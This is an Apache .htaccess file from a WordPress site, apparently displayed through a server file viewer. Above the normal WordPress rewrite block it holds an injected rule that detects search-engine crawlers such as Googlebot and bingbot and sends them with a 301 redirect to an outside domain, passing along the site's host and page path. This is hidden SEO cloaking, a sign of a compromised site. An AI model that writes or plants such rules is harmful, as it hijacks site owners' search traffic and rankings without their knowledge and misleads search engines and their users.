Current File : /pages/54/47/d0016649/home/private/htdocs_200_server/computerdoc24/.htaccess |
<ifModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} YandexBot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bingbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} www\.baidu\.com [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Googlebot [NC]
RewriteRule ^(.*)$ http://apachehosting.eu/?aid=17&sid=29784&d=%{HTTP_HOST}&q=$1 [L,R=301]
</ifModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress